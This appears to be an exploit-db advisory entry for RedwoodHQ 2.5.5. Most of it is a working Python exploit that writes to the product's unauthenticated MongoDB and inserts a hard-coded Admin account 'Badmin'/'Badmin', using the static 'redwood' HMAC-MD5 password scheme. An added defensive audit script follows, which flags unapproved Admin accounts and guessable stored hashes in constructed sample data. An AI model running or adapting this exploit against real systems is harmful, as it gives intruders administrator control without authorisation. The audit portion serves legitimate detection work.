RedwoodHQ 2.5.5 - Authentication Bypass

17 Jun 2019 | Reported by EthicalHCOP | Type: exploitdb | Source: www.exploit-db.com

RedwoodHQ 2.5.5 Authentication Bypass, Create Admin User without Authentication

Code
#!/usr/bin/python3
# -*- encoding: utf-8 -*-

# Exploit Title:   RedxploitHQ (Create Admin User by missing authentication on db)
# Date: 	       14-june-2019
# Exploit Author:  EthicalHCOP
# Version: 	       2.0 / 2.5.5
# Vendor Homepage: https://redwoodhq.com/
# Software Link:   https://redwoodhq.com/redwood-download/
# Tested on: 	   Ubuntu and Windows.
# Twitter:	       @EthicalHcop
# Usage:           python3 RedxploitHQ.py -H mongo_host -P mongo_port
# Description: 	   Use RedxploitHQ to create a new Admin user in redwoodhq and get all the functions of the framework
# 
# RedwoodHQ doesn't require that MongoDB is installed on the machine because this tool has its own Mongo Launcher. 
# The problem is that this vendor database doesn't require any authentication to read its data. 
# So, I use the same syntax that the Framework uses to create my admin user on the database and access the tool
# 
# POC:             https://youtu.be/MK9AvoJDtxY

import hashlib
import hmac
import optparse
from pymongo import MongoClient

def CreateHMAC(Pass):
    message = bytes(Pass,encoding='utf8')
    secret = bytes('redwood',encoding='utf8')
    hash = hmac.new(secret, message, hashlib.md5)
    return (hash.hexdigest())

def DbConnect(ip,port):
    uri = "mongodb://" + ip + ":" + port + "/"
    con = MongoClient(uri)
    return con

def DbDisconnect(con):
    con.close()

def CreateBadminUser(ip, port, user, passw):
    con = DbConnect(ip, port)
    db = con.automationframework
    usr = db.users
    passw = CreateHMAC(passw)
    data = {
        "name": user,
        "password": passw,
        "tag": [],
        "role": "Admin",
        "username": user,
        "status": ""
    }
    usr.insert_one(data)
    DbDisconnect(con)

def start():
    parser = optparse.OptionParser('usage %prog ' + \
                                   '-H host -P port')
    parser.add_option('-P', '--Port', dest='port', type='string', \
                      help='MongoDB Port')
    parser.add_option('-H', '--Host', dest='host', type='string', \
                      help='MongoDB Host')
    (options, args) = parser.parse_args()
    ip = options.host
    port = options.port
    if (str(ip) == "None"):
        print("Insert Host")
        exit(0)
    if (str(port) == "None"):
        port = "27017"
    try:
        CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin')
        print("[+] New user 'Badmin'/'Badmin' created.")
    except Exception as e:
        print("[-] Can't create the 'Badmin'/'Badmin' user. Error: "+str(e))

if __name__ == '__main__':
    start()
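
A defender-side check for the condition this entry describes, added here as an example and not part of the original exploit-db entry or of RedwoodHQ's code: it audits user documents exported from the `automationframework` `users` collection, flagging Admin accounts that are missing from an approved list and stored passwords that match the username (or a supplied weak list) under the static-key HMAC-MD5 scheme shown above. The sample documents, the approved list, the `User` role value and all function names are constructed assumptions.

```python
import hashlib
import hmac

# Static HMAC key that the PoC above uses to build the stored password value.
STATIC_KEY = b"redwood"
REASON_ADMIN = "Admin account is not on the approved list"
REASON_WEAK = "stored password matches the username or a weak-list entry"

def stored_hash(password):
    """Value found in the 'password' field: HMAC-MD5 keyed with STATIC_KEY."""
    return hmac.new(STATIC_KEY, password.encode("utf8"), hashlib.md5).hexdigest()

def audit_users(docs, approved_admins, weak_passwords=()):
    """Return a list of (username, reason) findings for user documents."""
    findings = []
    for doc in docs:
        user = str(doc.get("username", ""))
        # Any Admin the operators did not provision is suspect, because the
        # database accepts writes without authentication.
        if doc.get("role") == "Admin" and user not in approved_admins:
            findings.append((user, REASON_ADMIN))
        # The key is static and public, so guessable passwords can be
        # recomputed and compared offline by anyone who can read the data.
        for guess in {user, *weak_passwords}:
            if guess and doc.get("password") == stored_hash(guess):
                findings.append((user, REASON_WEAK))
                break
    return findings

# Constructed sample export (not real data), shaped like the PoC's document.
SAMPLE_USERS = [
    {"name": "admin", "username": "admin", "role": "Admin", "tag": [],
     "status": "", "password": stored_hash("constructed-long-passphrase")},
    {"name": "Badmin", "username": "Badmin", "role": "Admin", "tag": [],
     "status": "", "password": stored_hash("Badmin")},
    {"name": "qa1", "username": "qa1", "role": "User", "tag": [],
     "status": "", "password": stored_hash("qa1")},
]

if __name__ == "__main__":
    for user, reason in audit_users(SAMPLE_USERS, approved_admins={"admin"}):
        print(f"[!] {user}: {reason}")
```

A finding from this audit only shows that the account list has drifted; the underlying condition is the one the entry names, a MongoDB instance that accepts reads and writes without authentication.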

Vulners AI Score: 7.4 (High risk)